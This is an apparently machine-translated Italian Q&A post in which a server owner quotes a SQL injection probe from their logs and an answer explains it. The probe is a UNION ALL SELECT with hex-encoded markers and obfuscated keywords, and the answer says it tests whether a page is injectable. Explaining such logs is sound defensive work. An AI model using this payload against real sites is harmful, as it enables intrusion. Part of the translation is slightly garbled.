Iniezione Sql qualcuno può spiegare questo codice a me

Question

Ho visto questo SQL injection/attacco su uno dei miei server e vorrei sapere cosa sta cercando di fare. So che è un attacco e dopo aver fatto ricerche su Google, vedo che viene usato molto ma non vedo una spiegazione di cosa sta facendo e di cosa sia l'esadecimale o il binario. Ecco l'attacco

press-detail.php?id=999999.9+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39,0x393133353134353632382e39,0x393133353134353632392e39,0x39313335313435363231302e39,0x39313335313435363231312e39,0x39313335313435363231322e39,0x39313335313435363231332e39,0x39313335313435363231342e39,0x39313335313435363231352e39,0x39313335313435363231362e39,0x39313335313435363231372e39,0x39313335313435363231382e39,0x39313335313435363231392e39,0x39313335313435363232302e39,0x39313335313435363232312e39,0x39313335313435363232322e39,0x39313335313435363232332e39,0x39313335313435363232342e39,0x39313335313435363232352e39,0x39313335313435363232362e39,0x39313335313435363232372e39,0x39313335313435363232382e39,0x39313335313435363232392e39,0x39313335313435363233302e39,0x39313335313435363233312e39,0x39313335313435363233322e39,0x39313335313435363233332e39,0x39313335313435363233342e39,0x39313335313435363233352e39,0x39313335313435363233362e39,0x39313335313435363233372e39,0x39313335313435363233382e39,0x39313335313435363233392e39,0x39313335313435363234302e39,0x39313335313435363234312e39,0x39313335313435363234322e39,0x39313335313435363234332e39,0x39313335313435363234342e39,0x39313335313435363234352e39,0x39313335313435363234362e39,0x39313335313435363234372e39,0x39313335313435363234382e39,0x39313335313435363234392e39,0x39313335313435363235302e39,0x39313335313435363235312e39,0x39313335313435363235322e39,0x39313335313435363235332e39,0x39313335313435363235342e39,0x39313335313435363235352e39,0x39313335313435363235362e39,0x39313335313435363235372e39,0x39313335313435363235382e39,0x39313335313435363235392e39,0x39313335313435363236302e39,0x39313335313435363236312e39,0x39313335313435363236322e39,0x39313335313435363236332e39,0x39313335313435363236342e39,0x39313335313435363236352e39,0x39313335313435363236362e39,0x39313335313435363236372e39,0x39313335313435363236382e39,0x39313335313435363236392e39,0x39313335313435363237302e39,0x39313335313435363237312e39,0x39313335313435363237322e39,0x39313335313435363237332e39+and+'1'='1 

Quello che vorrei sapere perché "999.999,9", ciò che è "0x39313335313435363237322e39". Quando questo attacco funziona quali informazioni avrebbero gli hacker o modifiche avrebbero fatto al database. Per ultimo, questo attacco può essere eseguito più e più volte con un arresto/arresto anomalo del server?

Qualsiasi spiegazione di questo codice sarebbe molto apprezzata.

Answer 1

Quindi, come è being used a lot, vorrei presentare la mia risposta.

A mio parere, lo scopo di queste richieste è verificare la presenza o l'assenza di una iniezione sql. Questa è la parte della query che sta cercando di iniettare:

999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9" and '1'='1 

L'obiettivo dell'attaccante è quello di completare la query in questo modo:

SELECT * FROM table WHERE field=999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9" 

Se field non è sterilizzate, e solo se il numero delle colonne utilizzate nello UNION SELECT corrisponde alle colonne della query, molto probabilmente verrà visualizzata la stringa 91351456272.9 da qualche parte nella pagina.

Questa sarà la conferma per l'utente malintenzionato di una vulnerabilità nella pagina.